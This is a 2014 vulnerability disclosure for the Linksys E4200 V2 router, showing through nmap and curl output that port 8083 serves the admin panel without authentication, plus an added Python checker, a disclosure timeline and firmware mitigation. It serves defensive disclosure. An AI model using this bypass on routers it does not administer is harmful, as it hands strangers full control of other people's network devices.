Model: Linksys E4200 V2 Router
Vendor Disclosure: 12th February 2014
Public Disclosure: 4th June 2014
Bypass Web Panel Authentication and Gain Full Administrative Privileges on Device
I discovered the Linksys E4200 V2 Router has a backdoor that bypasses HTTP/S authentication and gives full administrative access to the admin panel.
The device listens on port 8083 and serves the same web interface as port 80, but completely bypasses HTTP/S authentication, granting admin privileges on the device.
This is not the same as 'TheMoon' Worm Remote Code Execution Vulnerability.
A portscan of the device shows port 8083/tcp listening for connections:
[phrag@box ~]$ nmap 192.168.2.4
PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
139/tcp  open  netbios-ssn
443/tcp  open  https
445/tcp  open  microsoft-ds
8083/tcp open  us-srv
An HTTP GET request on port 80 without authentication returns 401 Unauthorized:
[phrag@box ~]$ curl -i http://192.168.2.10:80
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Basic realm="Linksys E4200"
Content-Type: text/html
Content-Length: 351
Date: Tue, 11 Feb 2014 23:41:11 GMT
Server: lighttpd/1.4.28
An HTTP GET request on port 8083 without authentication returns 200 OK and serves the admin panel with full privileges:
[phrag@box ~]$ curl -i http://192.168.2.10:8083
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Date: Tue, 11 Feb 2014 23:35:36 GMT
Server: lighttpd/1.4.28
<!--
// Utopia_Init: SUCCEEDED (rc = 1)
// Utopia_GetDeviceSettings: SUCCEEDED (rc = 0)
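The two curl responses above are the whole test: the normal port answers with a 401 and a Basic challenge, the alternate port answers 200 from the same lighttpd daemon. The following Python audit helper is an added example, not part of the original advisory, for checking a router you administer for this exact inconsistency and for confirming after a firmware upgrade that the alternate port is either closed or also challenges for credentials. The sample response text is constructed from the curl output above, and the host, port numbers and function names are my own assumptions; nothing is sent on the network unless probe() is called.

```python
import socket
import urllib.error
import urllib.request
from dataclasses import dataclass
from typing import Optional

# Constructed sample responses, modelled on the curl -i output in the
# advisory (not captured live by this script).
SAMPLE_PORT_80 = (
    "HTTP/1.1 401 Unauthorized\r\n"
    'WWW-Authenticate: Basic realm="Linksys E4200"\r\n'
    "Content-Type: text/html\r\n"
    "Content-Length: 351\r\n"
    "Server: lighttpd/1.4.28\r\n"
    "\r\n"
)
SAMPLE_PORT_8083 = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html;charset=utf-8\r\n"
    "Transfer-Encoding: chunked\r\n"
    "Server: lighttpd/1.4.28\r\n"
    "\r\n"
    "<!-- // Utopia_Init: SUCCEEDED (rc = 1)\r\n"
)


@dataclass
class Probe:
    port: int
    state: str                 # "open", "closed" or "error"
    status: Optional[int]      # HTTP status code when a response was parsed
    auth_required: bool        # 401 plus a WWW-Authenticate challenge
    server: Optional[str]      # Server header, used to confirm the same daemon


def parse_response(port: int, raw: str) -> Probe:
    """Parse a raw HTTP response head (status line + headers) into a Probe."""
    head = raw.partition("\r\n\r\n")[0]
    lines = head.split("\r\n")
    try:
        status = int(lines[0].split(" ", 2)[1])
    except (IndexError, ValueError):
        return Probe(port, "error", None, False, None)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    auth_required = status == 401 and "www-authenticate" in headers
    return Probe(port, "open", status, auth_required, headers.get("server"))


def assess(reference: Probe, alternate: Probe) -> str:
    """Compare the normal web port against the alternate port.

    FAIL means the alternate port serves the interface without the challenge
    the reference port enforces, i.e. the behaviour the advisory describes.
    After a firmware fix the expected result is one of the 'ok' cases.
    """
    if alternate.state == "closed":
        return "ok: alternate port %d is closed" % alternate.port
    if alternate.state == "error" or reference.state != "open":
        return "inconclusive: probe error, re-run against the device"
    if reference.auth_required and alternate.status == 200:
        same = " (same Server header)" if reference.server == alternate.server else ""
        return "FAIL: port %d returns 200 without authentication while port %d requires it%s" % (
            alternate.port, reference.port, same)
    if alternate.auth_required:
        return "ok: alternate port %d requires authentication" % alternate.port
    return "review: alternate port %d returned HTTP %s" % (alternate.port, alternate.status)


def _head(code, reason, headers) -> str:
    # Rebuild a raw response head so probe() and the samples share one parser.
    return "HTTP/1.1 %d %s\r\n%s\r\n" % (
        code, reason, "".join("%s: %s\r\n" % kv for kv in headers))


def probe(host: str, port: int, timeout: float = 3.0) -> Probe:
    """Fetch / without credentials, equivalent to the curl -i calls in the
    advisory. Intended for a device you administer."""
    url = "http://%s:%d/" % (host, port)
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            raw = _head(resp.status, resp.reason, resp.getheaders())
    except urllib.error.HTTPError as err:          # 401 etc. still carry headers
        raw = _head(err.code, err.reason, err.headers.items())
    except urllib.error.URLError as err:           # refused vs. other failures
        closed = isinstance(err.reason, ConnectionRefusedError)
        return Probe(port, "closed" if closed else "error", None, False, None)
    except (socket.timeout, OSError):
        return Probe(port, "error", None, False, None)
    return parse_response(port, raw)


if __name__ == "__main__":
    # Offline demonstration on the constructed samples. To audit a real
    # device use: assess(probe(host, 80), probe(host, 8083))
    print(assess(parse_response(80, SAMPLE_PORT_80),
                 parse_response(8083, SAMPLE_PORT_8083)))
```

On the constructed samples assess() reports FAIL with a note that both ports present the same Server header, which is the point the advisory makes: it is the same daemon, not a second service. A connection-refused result on 8083, or a 401 with a challenge, is the state to expect after applying the vendor firmware.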
Internal: Allows anyone on the network full admin privileges over the device.
External: This depends entirely on the network configuration. Considering only bridge mode, some forwarding or DMZ would need to be in place to expose this on the internet.
Unknown: Further testing with alternate configurations other than bridge mode is required.
The device was reset to factory default settings and configured minimally for testing with admin password, wifi, bridge mode.
Firmware 2.0.37 was installed from the factory and the firmware screen incorrectly reports that it is running the latest firmware (see screenshot below). New firmware has been available from the Linksys support site since 2012. The device had internet access. Therefore the device's firmware update checking feature is broken, which makes this more serious, as non-technical users may not be aware that new firmware is available and are unknowingly exposed by this backdoor.
This is apparently fixed in newer firmware versions, however there is no mention of this vulnerability in the changelog and Linksys (Belkin) refuse to give me a copy of the 2.0.36 firmware, so I am unable to test new firmware without losing access to the old.
As part of a responsible disclosure process, I contacted Linksys on February 12th. It took a few weeks before they took me seriously, but they then responded and asked me to do more testing. I did and gave them the results, after which they committed to releasing a CVE for this.
It is now June and neither a CVE nor any further correspondence from Linksys has been received, even after I contacted them multiple times for an update, and again 1 week ago stating that I would like to publicly disclose this vulnerability.
I publicly disclosed this for the following reasons:
Linksys (who are now owned by Belkin) failed to take this vulnerability seriously, address the issue in a timely manner and disclose the problem to their customers, which left them at risk.
The undocumented port 8083 issue, with the resulting administrative access, was previously discovered several months ago by another researcher and was already assigned CVE-2013-5122:
"It is recommend to upgrade to firmware 2.1.39 on the E4200v2"
"by simply browsing to: http://
It must be noted that I only tested this in bridge mode as I did not want to expose it on the internet and have limited lab equipment.
Mitigation: Manually download and upgrade to the latest firmware from Linksys E4200 Support
published on 2014-06-04 13:33:37 by phrag